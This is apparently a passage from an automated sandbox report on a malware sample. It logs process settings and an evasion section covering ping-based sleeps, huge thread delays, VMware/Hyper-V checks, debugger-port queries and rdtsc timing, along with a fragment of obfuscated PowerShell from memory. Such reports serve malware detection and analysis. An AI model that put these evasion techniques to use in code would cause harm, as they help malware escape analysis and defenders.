          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Uses ping.exe to sleep
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping google.com -n 1
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping google.com -n 1Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BAD1C0 rdtsc 15_2_23BAD1C0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6358Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3472Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8534Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1185Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 361Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 0.4 %
          Source: C:\Windows\SysWOW64\clip.exeAPI coverage: 2.2 %
          Source: C:\Windows\System32\wscript.exe TID: 6744Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444Thread sleep time: -3689348814741908s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7612Thread sleep count: 8534 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7612Thread sleep count: 1185 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7644Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8104Thread sleep count: 361 > 30Jump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\clip.exeLast function: Thread delayed
          Source: C:\Windows\System32\cmd.exeFile Volume queried: C:\Windows\System32 FullSizeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: wscript.exe, 00000000.00000002.1738541930.00000271C00C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: wscript.exe, 00000000.00000003.1738052606.00000271C231D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}A
          Source: wscript.exe, 00000000.00000002.1739125471.00000271C2093000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1737516212.00000271C2093000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1690318667.00000271C2093000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1691643848.00000271C2093000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1691509199.00000271C2005000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1738992247.00000271C202C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735994815.00000271C2093000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1690992572.00000271C2093000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1735994815.00000271C202C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1691643848.00000271C202C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: wscript.exe, 00000000.00000003.1738052606.00000271C231D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: wscript.exe, 00000000.00000003.1737953396.00000271C00DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\j[
          Source: powershell.exe, 00000007.00000002.2841422392.000001A9A48D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWko%SystemRoot%\system32\mswsock.dllGaast[Gidse$BaadsPRadiorAp.thi.ublem Out.e DybsvnoncoaCarpolLimitl.istayPassu]Start=Obser$TermiUEdsafdHoboesbetitkRigdoi AnaplPatrul remseju.aesUenig ');$Naturtr=Tyknende ' ArabFI dder Unhee ExtreAfsvkls.epnaHo monAlbincIntege
          Source: powershell.exe, 0000000A.00000002.2228572118.0000000008230000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWB
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeProcess queried: DebugPortJump to behavior
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exeProcess queried: DebugPortJump to behavior
          Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exeProcess queried: DebugPortJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BAD1C0 rdtsc 15_2_23BAD1C0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0463D244 LdrInitializeThunk,LdrInitializeThunk,10_2_0463D244
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B533A5 mov eax, dword ptr fs:[00000030h]15_2_23B533A5
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B633A0 mov eax, dword ptr fs:[00000030h]15_2_23B633A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B633A0 mov eax, dword ptr fs:[00000030h]15_2_23B633A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B8739A mov eax, dword ptr fs:[00000030h]15_2_23B8739A
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B8739A mov eax, dword ptr fs:[00000030h]15_2_23B8739A
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B28397 mov eax, dword ptr fs:[00000030h]15_2_23B28397
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B28397 mov eax, dword ptr fs:[00000030h]15_2_23B28397
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B28397 mov eax, dword ptr fs:[00000030h]15_2_23B28397
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2E388 mov eax, dword ptr fs:[00000030h]15_2_23B2E388
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2E388 mov eax, dword ptr fs:[00000030h]15_2_23B2E388
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2E388 mov eax, dword ptr fs:[00000030h]15_2_23B2E388
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B5438F mov eax, dword ptr fs:[00000030h]15_2_23B5438F
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B5438F mov eax, dword ptr fs:[00000030h]15_2_23B5438F
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23C053FC mov eax, dword ptr fs:[00000030h]15_2_23C053FC
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B4E3F0 mov eax, dword ptr fs:[00000030h]15_2_23B4E3F0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B4E3F0 mov eax, dword ptr fs:[00000030h]15_2_23B4E3F0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B4E3F0 mov eax, dword ptr fs:[00000030h]15_2_23B4E3F0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B663FF mov eax, dword ptr fs:[00000030h]15_2_23B663FF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BEF3E6 mov eax, dword ptr fs:[00000030h]15_2_23BEF3E6
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23C0539D mov eax, dword ptr fs:[00000030h]15_2_23C0539D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B403E9 mov eax, dword ptr fs:[00000030h]15_2_23B403E9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B403E9 mov eax, dword ptr fs:[00000030h]15_2_23B403E9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B403E9 mov eax, dword ptr fs:[00000030h]15_2_23B403E9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B403E9 mov eax, dword ptr fs:[00000030h]15_2_23B403E9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B403E9 mov eax, dword ptr fs:[00000030h]15_2_23B403E9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B403E9 mov eax, dword ptr fs:[00000030h]15_2_23B403E9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B403E9 mov eax, dword ptr fs:[00000030h]15_2_23B403E9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B403E9 mov eax, dword ptr fs:[00000030h]15_2_23B403E9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BEB3D0 mov ecx, dword ptr fs:[00000030h]15_2_23BEB3D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BEC3CD mov eax, dword ptr fs:[00000030h]15_2_23BEC3CD
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B3A3C0 mov eax, dword ptr fs:[00000030h]15_2_23B3A3C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B3A3C0 mov eax, dword ptr fs:[00000030h]15_2_23B3A3C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B3A3C0 mov eax, dword ptr fs:[00000030h]15_2_23B3A3C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B3A3C0 mov eax, dword ptr fs:[00000030h]15_2_23B3A3C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B3A3C0 mov eax, dword ptr fs:[00000030h]15_2_23B3A3C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B3A3C0 mov eax, dword ptr fs:[00000030h]15_2_23B3A3C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB63C0 mov eax, dword ptr fs:[00000030h]15_2_23BB63C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23C05341 mov eax, dword ptr fs:[00000030h]15_2_23C05341
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B27330 mov eax, dword ptr fs:[00000030h]15_2_23B27330
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BF132D mov eax, dword ptr fs:[00000030h]15_2_23BF132D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BF132D mov eax, dword ptr fs:[00000030h]15_2_23BF132D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B5F32A mov eax, dword ptr fs:[00000030h]15_2_23B5F32A
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B2C310 mov ecx, dword ptr fs:[00000030h]15_2_23B2C310
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B50310 mov ecx, dword ptr fs:[00000030h]15_2_23B50310
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB930B mov eax, dword ptr fs:[00000030h]15_2_23BB930B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB930B mov eax, dword ptr fs:[00000030h]15_2_23BB930B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB930B mov eax, dword ptr fs:[00000030h]15_2_23BB930B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B6A30B mov eax, dword ptr fs:[00000030h]15_2_23B6A30B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B6A30B mov eax, dword ptr fs:[00000030h]15_2_23B6A30B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B6A30B mov eax, dword ptr fs:[00000030h]15_2_23B6A30B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BD437C mov eax, dword ptr fs:[00000030h]15_2_23BD437C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B37370 mov eax, dword ptr fs:[00000030h]15_2_23B37370
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B37370 mov eax, dword ptr fs:[00000030h]15_2_23B37370
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B37370 mov eax, dword ptr fs:[00000030h]15_2_23B37370
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BEF367 mov eax, dword ptr fs:[00000030h]15_2_23BEF367
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B29353 mov eax, dword ptr fs:[00000030h]15_2_23B29353
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23B29353 mov eax, dword ptr fs:[00000030h]15_2_23B29353
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB035C mov eax, dword ptr fs:[00000030h]15_2_23BB035C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB035C mov eax, dword ptr fs:[00000030h]15_2_23BB035C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB035C mov eax, dword ptr fs:[00000030h]15_2_23BB035C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB035C mov ecx, dword ptr fs:[00000030h]15_2_23BB035C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB035C mov eax, dword ptr fs:[00000030h]15_2_23BB035C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB035C mov eax, dword ptr fs:[00000030h]15_2_23BB035C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BFA352 mov eax, dword ptr fs:[00000030h]15_2_23BFA352
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB2349 mov eax, dword ptr fs:[00000030h]15_2_23BB2349
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB2349 mov eax, dword ptr fs:[00000030h]15_2_23BB2349
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB2349 mov eax, dword ptr fs:[00000030h]15_2_23BB2349
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB2349 mov eax, dword ptr fs:[00000030h]15_2_23BB2349
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB2349 mov eax, dword ptr fs:[00000030h]15_2_23BB2349
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB2349 mov eax, dword ptr fs:[00000030h]15_2_23BB2349
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_23BB2349 mov eax, dword ptr fs:[00000030h]15_2_23BB2349
